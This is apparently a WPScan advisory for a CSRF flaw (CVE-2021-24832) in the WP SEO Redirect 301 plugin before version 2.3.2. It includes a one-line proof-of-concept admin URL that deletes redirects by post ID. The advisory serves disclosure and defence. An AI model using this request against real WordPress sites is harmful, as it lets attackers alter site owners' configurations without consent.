logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

WP SEO Redirect 301 < 2.3.2 - Redirect Deletion via CSRF

Description

The plugin does not have CSRF in place when deleting redirects, which could allow attackers to make a logged in admin delete them via a CSRF attack

Proof of Concept

https://example.com/wp-admin/admin.php?page=wp-seo-redirect-301/seo_redirect_list.php&delete_id=12&delete_url=https://example.com/yolo

delete_id is the post id, which is public and the delete_url is the URL that redirects to the destination. So an attacker has all the info to exploit it

Affects Plugins

wp-seo-redirect-301

Fixed in version 2.3.2

References

CVE

CVE-2021-24832

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CWE-352

Miscellaneous

Original Researcher

Francesco Carlucci

Submitter

Francesco Carlucci

Submitter website

https://carluc.ci

Submitter twitter

francecarlucci

Verified

Yes

WPVDB ID

cf031259-b76e-475c-8a8e-fa6a0d9e7bb4

Timeline

Publicly Published

2021-10-11 (about 16 days ago)

Added

2021-10-11 (about 16 days ago)

Last Updated

2021-10-11 (about 16 days ago)

Our Other Services

WPScan WordPress Security Plugin